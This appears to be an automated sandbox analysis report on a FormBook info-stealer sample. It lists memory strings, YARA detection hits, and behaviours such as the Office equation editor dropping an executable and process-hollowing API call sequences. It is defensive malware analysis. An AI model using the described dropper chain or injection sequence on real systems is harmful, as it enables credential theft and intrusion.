          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2145875175.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2145136423.0000000003E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347696044.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2145875175.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2144767628.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000002.2347379246.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004C00AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004C1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418180 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418230 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004182B0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418360 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041822A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004182AA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041835E NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FFB4 NtCreateSection,LdrInitializeThunk,
